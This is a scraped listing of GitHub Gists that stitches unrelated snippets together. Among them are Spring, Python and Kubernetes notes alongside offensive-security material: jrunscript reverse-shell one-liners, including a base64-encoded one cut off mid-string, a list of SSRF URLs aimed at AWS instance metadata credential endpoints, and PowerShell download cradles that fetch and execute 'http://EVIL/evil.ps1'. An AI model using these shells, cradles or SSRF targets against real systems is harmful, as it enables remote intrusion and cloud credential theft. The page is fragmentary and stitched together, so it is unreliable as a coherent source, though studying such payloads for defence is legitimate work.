首先,localhost 就是一个域名,域名指向 127.0.0.1,两者是一样的,如果是 mac,可以在 /etc/hosts 文件中看到这一行。
127.0.0.1 localhost
loomismilitia
/ spel-support-in-spring-data-jpa-query-definitions.md
Last active
April 21, 2018 05:02
SpEL support in Spring Data JPA
#Spring Data JPA - Advanced SpEL expressions in Query definitions
@Query("select u from User u where u.emailAddress = ?#{principal.emailAddress}")
List<User> findCurrentUserWithCustomQuery();For more information please visit: https://spring.io/blog/2014/07/15/spel-support-in-spring-data-jpa-query-definitions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
jherax
/ is-private-mode.js
Last active
March 19, 2024 18:29
Detect if the browser is running in Private mode - Promise based (last update: Feb 2020)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Lightweight script to detect whether the browser is running in Private mode. | |
| * @returns {Promise<boolean>} | |
| * | |
| * Live demo: | |
| * @see https://output.jsbin.com/tazuwif | |
| * | |
| * This snippet uses Promises. If you want to run it in old browsers, polyfill it: | |
| * @see https://cdn.jsdelivr.net/npm/es6-promise@4/dist/es6-promise.auto.min.js | |
| * |
kurozumi
/ peewee-retry.py
Created
August 18, 2016 00:13
【Python】peeweeでError 2006: MySQL server has gone awayとなったときに再接続させる方法
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from peewee import * | |
| from playhouse.shortcuts import RetryOperationalError | |
| class RetryDB(RetryOperationalError, MySQLDatabase): | |
| pass | |
| db = RetryDB('app') |
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
BuffaloWill
/ cloud_metadata.txt
Last active
May 25, 2024 21:22
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
jloveland
/ 5 minute local Kubernetes Cluster on Mac
Last active
December 17, 2021 17:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Reference: | |
| https://www.cloudgear.net/blog/2015/5-minutes-kubernetes-setup/ | |
| # install homebrew and cask | |
| ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" | |
| # install virtualbox | |
| brew cask install virtualbox | |
| # install dockertoolbox |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |